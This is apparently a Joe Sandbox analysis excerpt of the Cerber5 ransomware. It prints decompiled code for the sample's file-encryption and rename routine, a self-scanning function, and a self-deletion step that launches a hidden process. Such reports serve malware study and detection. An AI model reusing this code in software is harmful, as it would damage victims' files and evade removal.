												_t35 =  &_v12;
												 *_t35 = _v12 - 1;
											} while ( *_t35 != 0);
											_t157 = _v16;
										}
										_v80.bottom = _v20;
										_v80.left = 0;
										_v80.top = 0;
										_v80.right = _t157;
										DrawTextA(_t150, _v24, 0xffffffff,  &_v80, 0x411);
										asm("cdq");
										asm("cdq");
										_v64.top = (_v64.bottom - _t148 >> 1) - (_v80.bottom - _t148 >> 1);
										DrawTextA(_t150, _v24, 0xffffffff,  &_v64, 0x11);
										_v5 = E00408485(_v80.bottom - _t148 >> 1, _v28, _a8, _a12, _a16);
										SelectObject(_t150, _v36);
										DeleteObject(_v40);
									}
									SelectObject(_t150, _v44);
									DeleteObject(_v28);
									_t151 = _v48;
								}
								DeleteDC(_t150);
							}
							ReleaseDC(0, _t151);
						}
					}
				}
				return _v5;
			}

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938

GetDC.USER32(00000000), ref: 00408745
CreateCompatibleDC.GDI32(00000000), ref: 00408759
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040876C
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408778
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408786
SelectObject.GDI32(00000000,00000000), ref: 00408799
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004087A7
MulDiv.KERNEL32(00000000), ref: 004087D4
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408802
SelectObject.GDI32(00000000,00000000), ref: 00408815
SetBkColor.GDI32(00000000,00000000), ref: 00408845
SetTextColor.GDI32(00000000,00000000), ref: 00408872
GetStockObject.GDI32(00000002), ref: 0040888C
FillRect.USER32(00000000,?,00000000), ref: 00408898
SetPixel.GDI32(00000000,00000000,00000000,?), ref: 004088FA
DrawTextA.USER32(00000000,00000000,000000FF,?,00000411), ref: 00408926
DrawTextA.USER32(00000000,00000000,000000FF,?,00000011), ref: 0040894F
SelectObject.GDI32(00000000,?), ref: 00408970
DeleteObject.GDI32(?), ref: 00408979
SelectObject.GDI32(00000000,?), ref: 00408983
DeleteObject.GDI32(?), ref: 0040898C
DeleteDC.GDI32(00000000), ref: 00408996
ReleaseDC.USER32(00000000,00000000), ref: 0040899E

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Object$Select$CapsCreateDeleteDeviceText$ColorCompatibleDraw$BitmapFillFontPixelRectReleaseStocklstrcmpilstrlen
String ID:
API String ID: 3678731151-0
Opcode ID: ab6a367ea6c4df976df6772465d329ac0f17774f2ac684a2dd7e95bacafdd01a
Instruction ID: ef1943a7f34fee3139141099a9e207c1e29f1f4870d14a52305c2a9e29fd8a02
Opcode Fuzzy Hash: ab6a367ea6c4df976df6772465d329ac0f17774f2ac684a2dd7e95bacafdd01a
Instruction Fuzzy Hash: 738182B1D00218BFDB11AFA5DD459AE7BB8EF48715F01403AF905F72D1DA3849058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401A5B Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 350
filestringtimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401A5B(void* __eax, long __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, void* _a16, intOrPtr _a20) {
				signed char _v9;
				char _v10;
				signed int _v16;
				void* _v20;
				long _v24;
				signed int* _v28;
				long _v32;
				void* _v36;
				struct _OVERLAPPED* _v40;
				long _v44;
				long _v48;
				void* _v52;
				void* _v56;
				long _v60;
				signed int _v64;
				intOrPtr _v68;
				signed short _v72;
				struct _FILETIME _v80;
				struct _FILETIME _v88;
				struct _FILETIME _v96;
				signed int _v100;
				char _v126;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t141;
				void* _t156;
				intOrPtr _t160;
				struct _OVERLAPPED** _t161;
				long _t169;
				short _t173;
				long _t191;
				void* _t193;
				signed int _t200;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t228;
				signed short _t229;
				intOrPtr* _t238;
				long _t242;
				long _t243;
				long _t247;
				signed short _t251;
				void* _t254;
				void* _t256;
				struct _OVERLAPPED* _t259;
				void* _t265;
				void* _t268;
				void* _t276;
				void* _t277;
				void* _t281;
				void* _t283;

				_t243 = __edx;
				_t259 = 0;
				_t225 = __eax;
				_v16 = 0;
				_v10 = 0;
				_t141 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0);
				_v20 = _t141;
				if(_t141 == 0xffffffff) {
					L31:
					return _v10;
				}
				_t227 =  &_v72;
				 *0x40f214(_t141,  &_v72);
				_t276 = _v68 -  *0x42f7ac; // 0x0
				if(_t276 < 0) {
					L27:
					CloseHandle(_v20);
					if(_v16 != _t259) {
						if(_v10 != 0) {
							_v10 = MoveFileW(_a4, _v16) != 0;
						}
						E00405463(_v16);
					}
					goto L31;
				}
				if(_t276 > 0) {
					L4:
					_push(8);
					_v28 = E004053BD(_t227);
					_v128 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					E00405D99(_t227, _t243,  &_v128, 0xb, 0xf);
					_push(0x42fe98);
					_push( &_v128);
					_push(_a8);
					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
					_push( &_v16);
					E00405B0C(_t225, _t227,  &_v126, _t259, _t277);
					_t268 = _t265 + 0x2c;
					_t156 = E00404EA5(_v16);
					_pop(_t228);
					_t278 = _t156;
					if(_t156 == 0) {
						L7:
						_t229 = _v72;
						asm("cdq");
						_v64 =  *0x42f7b4 & 0x0000ffff;
						_v60 = _t243;
						_v96.dwLowDateTime = _t229 - 0x42f7c0->LowPart;
						_t160 = _v68;
						asm("sbb edx, [0x42f7c4]");
						_v9 = 0;
						_v24 = _t259;
						_t281 = _t160 - _v60;
						if(_t281 < 0 || _t281 <= 0 && _v96.dwLowDateTime <= _v64) {
							_t251 = _t229 & 0x0000ffff;
						} else {
							_t247 =  *0x42f7b8; // 0x0
							asm("sbb eax, [ebp-0x38]");
							_t242 = _t229 - _v64 - 0x42f7c0->LowPart;
							_t251 =  *0x42f7b4 & 0x0000ffff;
							asm("sbb eax, [0x42f7c4]");
							_v24 = _t247;
							_t283 = _t160 - _t259;
							if(_t283 <= 0 && (_t283 < 0 || _t242 < _t247)) {
								_v24 = _t242;
							}
							_v9 = 1;
						}
						_t161 = _v28;
						if(_t161 != _t259 || _v9 == 0) {
							if(_v9 != 0) {
								 *_t161 = _t259;
							}
							GetFileTime(_v20,  &_v80,  &_v88,  &_v96);
							_push(_t259);
							_v36 = ( *0x42f7a4 & 0x0000ffff) + _t225 + 0x17;
							SetFilePointerEx(_v20, 0x42f7c0->LowPart,  *0x42f7c4, _t259);
							_t169 = _t251 & 0x0000ffff;
							_v32 = _t169;
							ReadFile(_v20, _v36, _t169,  &_v60, _t259);
							 *((char*)(_t225 + 8)) = _v9;
							 *((intOrPtr*)(_t225 + 9)) = _v24;
							_t173 = 0x42f7c0->LowPart; // 0x0
							 *((short*)(_t225 + 0xf)) = _t173;
							 *(_t225 + 6) = lstrlenW(_a12) + _t174;
							 *(_t225 + 0xd) = _t251;
							 *((intOrPtr*)(_t225 + 0x11)) = E0040AF39( &_v60, _v32);
							_v36 = _t225 + 0x17;
							E00404B6E(_t225 + 0x17,  *0x42f7a4 & 0x0000ffff);
							_t233 =  *(_t225 + 6) & 0x0000ffff;
							_v44 = ( *(_t225 + 6) & 0x0000ffff) + 0x18 + (_v9 & 0x000000ff) * 8;
							_t254 = E004053BD( *(_t225 + 6) & 0x0000ffff);
							_v52 = _t254;
							_t288 = _t254 - _t259;
							if(_t254 != _t259) {
								 *((intOrPtr*)(_t254 + 4)) = _v80.dwHighDateTime;
								 *_t254 = _v80.dwLowDateTime;
								 *((intOrPtr*)(_t254 + 0xc)) = _v88.dwHighDateTime;
								 *(_t254 + 8) = _v88.dwLowDateTime;
								 *((intOrPtr*)(_t254 + 0x14)) = _v96.dwHighDateTime;
								 *(_t254 + 0x10) = _v96.dwLowDateTime;
								_t88 = _t254 + 0x18; // 0x18
								memcpy(_t88, _a12,  *(_t225 + 6) & 0x0000ffff);
								_t191 =  *0x42f794; // 0x0
								_v48 = _t191;
								_t193 = E0040B283(_t233, _t288,  *0x42f7bc, _t225,  &_v48);
								_v56 = _t193;
								if(_t193 != _t259) {
									_v100 = _v100 & 0x00000000;
									asm("cdq");
									asm("adc eax, edx");
									asm("adc eax, [0x42f7c4]");
									if(E0040194B(_v20, _v36, _v24, _a20, _v28,  *_v28 * _v24 + _v32 + 0x42f7c0->LowPart, _v100) != 0) {
										_t200 =  *(_t225 + 6) & 0x0000ffff;
										_t238 = _v28;
										 *((intOrPtr*)(_t254 + 0x18 + _t200)) =  *_t238;
										 *((intOrPtr*)(_t200 + _t254 + 0x1c)) =  *((intOrPtr*)(_t238 + 4));
										E0040AFFE( *0x42f7a4 & 0x0000ffff, _v44, _v36, _t254, _t259);
										_t226 = _v20;
										_push(_t259);
										SetFilePointerEx(_t226,  *0x42f7c0,  *0x42f7c4, _t259);
										_t256 = _a16;
										E00404B6E(_t256, _v32);
										WriteFile(_t226, _t256, _v32,  &_v24, _t259);
										_push(2);
										_v40 = _t259;
										asm("stosd");
										_t120 =  &_v40; // 0x40237c
										SetFilePointerEx(_t226,  *_t120, _v36, _t259);
										WriteFile(_t226, _v52, _v44,  &_v24, _t259);
										WriteFile(_t226, _v56, _v48,  &_v24, _t259);
										WriteFile(_t226,  *0x42f7b0,  *0x42f7a0,  &_v24, _t259);
										_t254 = _v52;
										_v10 = 1;
									}
									E00405463(_v56);
								}
								E00405463(_t254);
							}
						}
						E00405463(_v28);
						_t259 = 0;
						goto L27;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00405463(_v16);
					_v16 = _v16 & 0x00000000;
					_v128 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					E00405D99(_t228, _t243,  &_v128, 0xb, 0xf);
					_push(0x42fe98);
					_push( &_v128);
					_push(_a8);
					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
					_push( &_v16);
					E00405B0C(_t225, _t228,  &_v126, _v16, _t278);
					_t268 = _t268 + 0x2c;
					_t223 = E00404EA5(_v16);
					_pop(_t228);
					if(_t223 != 0) {
						goto L5;
					} else {
						_t259 = 0;
						goto L7;
					}
				}
				_t277 = _v72 -  *0x42f7a8; // 0x0
				if(_t277 < 0) {
					goto L27;
				}
				goto L4;
			}

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00401A80
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401A97
GetFileTime.KERNEL32(?,?,?,?), ref: 00401C27
SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401C4C
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401C64
lstrlenW.KERNEL32(?), ref: 00401C83
memcpy.NTDLL(00000018,?,?), ref: 00401D06
SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401DB6
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DD2
SetFilePointerEx.KERNEL32(?,|#@,?,00000000,00000002), ref: 00401DEB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DFD
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401E0F
WriteFile.KERNEL32(?,?,00000000), ref: 00401E27
CloseHandle.KERNEL32(?), ref: 00401E50
MoveFileW.KERNEL32(?,?), ref: 00401E67

Strings

|#@, xrefs: 00401DE7

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Write$Pointer$CloseCreateHandleMoveReadSizeTimelstrlenmemcpy
String ID: |#@
API String ID: 2810646288-1793031895
Opcode ID: 81c840d88c8de1d83fb7e166e0f123c82ea515b37ff8992445bab9daa1ce9efb
Instruction ID: 03c0d9b36c0c9c4c583867d549d6c9e758735e5455f2e97db342a84e4f9e9e08
Opcode Fuzzy Hash: 81c840d88c8de1d83fb7e166e0f123c82ea515b37ff8992445bab9daa1ce9efb
Instruction Fuzzy Hash: 04D13776D00118AFCB11DFA4DD45AAEBBB9FF48700F50407AF900B72A1D735A955CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406C8C Relevance: 24.3, APIs: 16, Instructions: 284
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406C8C(intOrPtr _a4) {
				char _v5;
				signed int _v12;
				DWORD* _v16;
				void* _v20;
				void* _v24;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t70;
				void* _t72;
				signed int _t74;
				intOrPtr _t79;
				void* _t80;
				signed int _t82;
				void* _t97;
				void* _t101;
				void* _t106;
				char* _t108;
				void* _t110;
				void* _t115;
				long _t117;
				intOrPtr* _t120;
				void* _t122;
				signed int _t127;
				signed int _t130;
				void* _t135;
				DWORD* _t138;
				signed int _t139;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t150;
				signed int _t152;
				void* _t153;
				void* _t154;
				void* _t156;
				void* _t157;
				signed int _t187;
				void* _t189;
				void* _t190;
				intOrPtr _t191;

				_v5 = 0;
				_t70 = CreateFileW(0x42f840, 0x80000000, 1, 0, 3, 0, 0);
				_v20 = _t70;
				if(_t70 == 0xffffffff) {
					L13:
					_t148 = CreateFileW(0x42f840, 0x80000000, 1, 0, 3, 0, 0);
					_v16 = _t148;
					if(_t148 != 0xffffffff) {
						_t101 = CreateFileMappingW(_t148, 0, 2, 0, 0, 0);
						_v20 = _t101;
						if(_t101 != 0) {
							_t146 = MapViewOfFile(_t101, 4, 0, 0, 0);
							if(_t146 != 0) {
								_t106 = GetFileSize(_t148, 0) + 0xfffffef6;
								_t153 = 0;
								_v24 = _t106;
								if(_t106 > 0) {
									do {
										_t108 = _t153 + _t146;
										if( *_t108 != 0x4c ||  *((char*)(_t153 + _t146 + 1)) != 0x82 ||  *((char*)(_t153 + _t146 + 2)) != 0xf3 ||  *((char*)(_t153 + _t146 + 3)) != 0x75 ||  *((char*)(_t153 + _t146 + 4)) != 0xf9 ||  *((char*)(_t153 + _t146 + 5)) != 0x76 ||  *((char*)(_t153 + _t146 + 6)) != 0x1f ||  *((char*)(_t153 + _t146 + 7)) != 0x51 ||  *((char*)(_t153 + _t146 + 8)) != 0xa) {
											goto L28;
										} else {
											_t183 =  *((char*)(_t153 + _t146 + 9)) - 0xc6;
											if( *((char*)(_t153 + _t146 + 9)) != 0xc6) {
												goto L28;
											} else {
												_push(_a4);
												_t47 = _t108 + 0x10a; // -4294966764
												_t153 = _t153 + 0xa;
												if(E00406A35(0, _t47, _t139, _t146, _t153, _t183) == 0) {
													goto L28;
												}
											}
										}
										goto L29;
										L28:
										_t153 = _t153 + 1;
										_t185 = _t153 - _v24;
									} while (_t153 < _v24);
								}
								L29:
								UnmapViewOfFile(_t146);
							}
							CloseHandle(_v20);
						}
						CloseHandle(_v16);
					}
				} else {
					_t110 = CreateFileMappingW(_t70, 0, 2, 0, 0, 0);
					_v24 = _t110;
					if(_t110 != 0) {
						_t147 = MapViewOfFile(_t110, 4, 0, 0, 0);
						if(_t147 != 0) {
							_t115 =  *((intOrPtr*)(_t147 + 0x3c)) + _t147;
							_t139 =  *(_t115 + 6) & 0x0000ffff;
							_t135 = ( *(_t115 + 0x14) & 0x0000ffff) + _t115 + 0x18;
							_t154 = 0;
							_v16 = 0;
							if(0 < _t139) {
								_t120 = _t135 + 0x14;
								_v12 = _t139;
								do {
									_t138 =  *_t120;
									if(_t138 > _v16) {
										_v16 = _t138;
										_t154 =  *((intOrPtr*)(_t120 - 4)) + _t138;
									}
									_t120 = _t120 + 0x28;
									_t15 =  &_v12;
									 *_t15 = _v12 - 1;
								} while ( *_t15 != 0);
							}
							_t117 = GetFileSize(_v20, 0);
							_t168 = _t117 - _t154;
							if(_t117 > _t154) {
								_push(_a4);
								_v5 = E00406A35(0, _t147 + _t117, _t139, _t147, _t154, _t168);
							}
							UnmapViewOfFile(_t147);
						}
						CloseHandle(_v24);
					}
					CloseHandle(_v20);
					if(_v5 == 0) {
						goto L13;
					}
				}
				_t72 = E00405905( &E0040D460, 7, 0xa798abfa);
				_t157 = _t156 + 0xc;
				_t74 = E004031AF(_a4, _t185, _t72);
				_pop(_t122);
				_v16 = _t74;
				if(_t74 != 0) {
					_t187 =  *0x42fa48; // 0x0
					if(_t187 == 0) {
						_t97 = E00405905( &E0040D468, 3, 0xd0d06399);
						_t157 = _t157 + 0xc;
						_t74 = E0040596B(E004032B8(E004031AF(_v16, _t187, _t97), _t187));
						_pop(_t122);
						 *0x42fa48 = _t74;
					}
					_t140 =  *0x42f83c; // 0x0
					if(_t140 != 0) {
						__eflags =  *0x42fa4c - 5;
						if(__eflags < 0) {
							_t80 = 0x14;
							 *0x42f83c = E004053CA(_t80, _t122, _t140);
							_t74 =  *0x42fa4c; // 0x0
							__eflags = _t74 - 5;
							if(__eflags < 0) {
								_t150 = _t74 << 2;
								_t82 = _t74 + 1;
								__eflags = _t82;
								_v12 = _t82;
								do {
									_push(_v12);
									wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
									_t157 = _t157 + 0x18;
									_t74 = E0040596B(E004032B8(E004031AF(_v16, __eflags,  &_v56), __eflags));
									 *0x42fa4c =  *0x42fa4c + 1;
									_v12 = _v12 + 1;
									_t127 =  *0x42f83c; // 0x0
									 *(_t150 + _t127) = _t74;
									_t150 = _t150 + 4;
									__eflags = _v12 - 6;
								} while (__eflags < 0);
							}
						}
					} else {
						_push(0x14);
						 *0x42fa4c = 5;
						_t74 = E004053B4(_t122);
						_t152 = 1;
						 *0x42f83c = _t74;
						_t189 =  *0x42fa4c - _t152; // 0x0
						if(_t189 >= 0) {
							do {
								_push(_t152);
								wsprintfA( &_v56, E00405905( &E0040D46C, 7, 0xc848aec3));
								_t157 = _t157 + 0x18;
								_t74 = E0040596B(E004032B8(E004031AF(_v16, _t189,  &_v56), _t189));
								_t130 =  *0x42f83c; // 0x0
								 *(_t130 + _t152 * 4 - 4) = _t74;
								_t152 = _t152 + 1;
								_t190 = _t152 -  *0x42fa4c; // 0x0
							} while (_t190 <= 0);
						}
					}
					_t191 =  *0x42fa50; // 0x0
					if(_t191 == 0) {
						_t79 = E0040596B(E004032B8(E004031AF(_v16, _t191, E00405905(0x40d474, 4, 0x8969c48e)), _t191));
						 *0x42fa50 = _t79;
						return _t79;
					}
				}
				return _t74;
			}

0x00406ca8
0x00406cab
0x00406cb1
0x00406cb7
0x00406d5c
0x00406d73
0x00406d75
0x00406d7b
0x00406d88
0x00406d8e
0x00406d93
0x00406da5
0x00406da9
0x00406db7
0x00406dbc
0x00406dbe
0x00406dc3
0x00406dc5
0x00406dc5
0x00406dcb
0x00000000
0x00406e05
0x00406e05
0x00406e0a
0x00000000
0x00406e0c
0x00406e0c
0x00406e0f
0x00406e15
0x00406e20
0x00000000
0x00000000
0x00406e20
0x00406e0a
0x00000000
0x00406e22
0x00406e22
0x00406e23
0x00406e23
0x00406dc5
0x00406e28
0x00406e29
0x00406e29
0x00406e32
0x00406e32
0x00406e3b
0x00406e3b
0x00406cbd
0x00406cc4
0x00406cca
0x00406ccf
0x00406cdd
0x00406ce1
0x00406ce6
0x00406cec
0x00406cf0
0x00406cf6
0x00406cf8
0x00406cfe
0x00406d00
0x00406d03
0x00406d06
0x00406d06
0x00406d0b
0x00406d10
0x00406d13
0x00406d13
0x00406d15
0x00406d18
0x00406d18
0x00406d18
0x00406d06
0x00406d21
0x00406d27
0x00406d29
0x00406d2b
0x00406d37
0x00406d37
0x00406d3b
0x00406d3b
0x00406d44
0x00406d44
0x00406d4d
0x00406d56
0x00000000
0x00000000
0x00406d56
0x00406e4d
0x00406e52
0x00406e59
0x00406e5e
0x00406e5f
0x00406e64
0x00406e6a
0x00406e70
0x00406e7e
0x00406e83
0x00406e98
0x00406e9d
0x00406e9e
0x00406e9e
0x00406ea3
0x00406eab
0x00406f29
0x00406f30
0x00406f34
0x00406f3a
0x00406f3f
0x00406f44
0x00406f47
0x00406f4b
0x00406f4e
0x00406f4e
0x00406f4f
0x00406f52
0x00406f52
0x00406f6e
0x00406f77
0x00406f8c
0x00406f91
0x00406f97
0x00406f9b
0x00406fa1
0x00406fa4
0x00406fa7
0x00406fa7
0x00406f52
0x00406f47
0x00406ead
0x00406ead
0x00406eb0
0x00406eba
0x00406ec1
0x00406ec2
0x00406ec7
0x00406ecd
0x00406ed3
0x00406ed3
0x00406eed
0x00406ef6
0x00406f0b
0x00406f11
0x00406f17
0x00406f1b
0x00406f1c
0x00406f1c
0x00406f24
0x00406ecd
0x00406fad
0x00406fb3
0x00406fdb
0x00406fe1
0x00000000
0x00406fe1
0x00406fb3
0x00406fea

APIs

CreateFileW.KERNEL32(0042F840,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000), ref: 00406CAB
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406CC4
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406CD7
GetFileSize.KERNEL32(?,00000000), ref: 00406D21
UnmapViewOfFile.KERNEL32(00000000), ref: 00406D3B
CloseHandle.KERNEL32(?), ref: 00406D44
CloseHandle.KERNEL32(?), ref: 00406D4D
CreateFileW.KERNEL32(0042F840,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D6D
CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406D88
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00406D9F
GetFileSize.KERNEL32(00000000,00000000), ref: 00406DB1
UnmapViewOfFile.KERNEL32(00000000), ref: 00406E29
CloseHandle.KERNEL32(?), ref: 00406E32
CloseHandle.KERNEL32(?), ref: 00406E3B
wsprintfA.USER32 ref: 00406EED
wsprintfA.USER32 ref: 00406F6E

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmapwsprintf
String ID:
API String ID: 470291713-0
Opcode ID: 200d1b3652ecac4f1242c4118547b72299b50a0db2f3aea314e0cfd9dd29a6e9
Instruction ID: 80c9848988a0ecdc918146eb7a2068c8117d091857d02b7a82775880087cebb1
Opcode Fuzzy Hash: 200d1b3652ecac4f1242c4118547b72299b50a0db2f3aea314e0cfd9dd29a6e9
Instruction Fuzzy Hash: 26A1E2B1D00205BFDB20ABA4EC85A6FBBB8EB04319F11457EF506F72D1D6388D598B58

Uniqueness

Uniqueness Score: -1.00%

Function 004082AB Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004082AB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				struct _SHELLEXECUTEINFOW _v72;
				short _v592;
				short _v1112;
				void* __esi;
				void* __ebp;
				void* _t19;
				signed int _t21;
				void* _t41;
				signed int _t42;
				void* _t48;
				void* _t49;
				intOrPtr* _t51;

				_t42 = __edx;
				_t41 = __ecx;
				_t19 = E004031AF(_a4, __eflags, E00405905(0x40d6c0, 0xd, 0x4756bd1a));
				_t49 = _t48 + 0x10;
				_t21 = E00403253(_t19, __eflags) | _t42;
				_t55 = _t21;
				if(_t21 != 0) {
					_push(__edi);
					SHChangeNotify(4, 0x3005, 0x42f840, 0);
					MoveFileExW(0x42f840, 0, 4);
					_push(0x42f840);
					_push(PathFindFileNameW(0x42f840));
					_push(E0040591C(0x40d6d0, 0x55, 0x2e7fd69b));
					_push( &_v8);
					_t21 = E00405B0C(__ebx, _t41, 0, 0x42f840, _t55);
					_t51 = _t49 + 0x1c;
					_t56 = _t21;
					if(_t21 != 0) {
						E00405F6B(_t41, _t56,  &_v12);
						 *_t51 = 0x104;
						GetSystemDirectoryW( &_v592, ??);
						_push( &_v592);
						wsprintfW( &_v1112, E0040591C(0x40d6b4, 0xa, 0x1440d523));
						memset( &(_v72.fMask), 0, 0x38);
						_v72.cbSize = 0x3c;
						_v72.fMask = 0x8600;
						_v72.lpVerb = E0040591C(0x40d6ac, 4, 0x96d648ae);
						_v72.lpFile =  &_v1112;
						_v72.lpParameters = _v8;
						_v72.nShow = 0;
						ShellExecuteExW( &_v72);
						_t21 = E00405463(_v8);
					}
					ExitProcess(0);
				}
				return _t21;
			}

APIs

SHChangeNotify.SHELL32(00000004,00003005,0042F840,00000000), ref: 004082F2
MoveFileExW.KERNEL32(0042F840,00000000,00000004,?,?,?,00000000), ref: 004082FC
PathFindFileNameW.SHLWAPI(0042F840,0042F840,?,?,?,00000000), ref: 00408304
ExitProcess.KERNEL32 ref: 004083CD

Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0042F840,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8

GetSystemDirectoryW.KERNEL32(?,?), ref: 0040834B
wsprintfW.USER32 ref: 00408374
memset.NTDLL ref: 00408381
ShellExecuteExW.SHELL32(0000003C), ref: 004083C1

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

Strings

<, xrefs: 00408392

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$AddressChangeDirectoryExecuteExitFindFreeHandleHeapModuleMoveNameNotifyPathProcProcessShellSystemmemsetwsprintf
String ID: <
API String ID: 2654349300-4251816714
Opcode ID: 5d04195fab23e333e7b57bdfe00b931c9a3ffbb541f513d44f927edc04739a11
Instruction ID: e81e65f490f2918546cf3dc480cadbfd72196a89e8115570de0b66540c6f6c56
Opcode Fuzzy Hash: 5d04195fab23e333e7b57bdfe00b931c9a3ffbb541f513d44f927edc04739a11
Instruction Fuzzy Hash: CF2182B1C40218BBDB10ABA1DD49F9F7BBCEB44715F04047AF608B6181E7785A488F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B53E Relevance: 15.1, APIs: 10, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B53E(void* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v212;
				void* __esi;
				void* _t11;
				WCHAR* _t16;
				WCHAR* _t26;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t44;
				WCHAR* _t46;
				WCHAR* _t47;
				WCHAR* _t49;
				WCHAR* _t52;
				WCHAR* _t53;
				WCHAR* _t54;

				_v5 = 0;
				_t11 = E0040591C(0x40d958, 0xb, 0xa0dd64f4);
				_t44 = E0040B08E( &_v12, __ecx, E0040591C(0x40d964, 0x1f, 0xab845937), _t11);
				_v12 = _t44;
				if(_t44 == 0) {
					L7:
					return _v5;
				} else {
					_t16 = StrChrW(_t44, 0x2d);
					_t49 = _t16;
					if(_t49 != 0) {
						StrCpyNW( &_v212, _t44, (_t16 - _t44 >> 1) + 1);
						GetTempPathW(0x104, 0x42fbc8);
						lstrcatW(0x42fbc8,  &_v212);
						_t52 =  &(_t49[1]);
						_t26 = StrChrW(_t52, 0x2d);
						_t46 = _t26;
						if(_t46 != 0) {
							StrCpyNW(0x42fdd0, _t52, (_t26 - _t52 >> 1) + 1);
							_t6 =  &(_t46[1]); // 0x2
							_t53 = _t6;
							_t31 = StrChrW(_t53, 0x2d);
							_t47 = _t31;
							if(_t47 != 0) {
								StrCpyNW(0x42fb00, _t53, (_t31 - _t53 >> 1) + 1);
								_t7 =  &(_t47[1]); // 0x2
								_t54 = _t7;
								_t36 = StrChrW(_t54, 0x2d);
								if(_t36 != 0) {
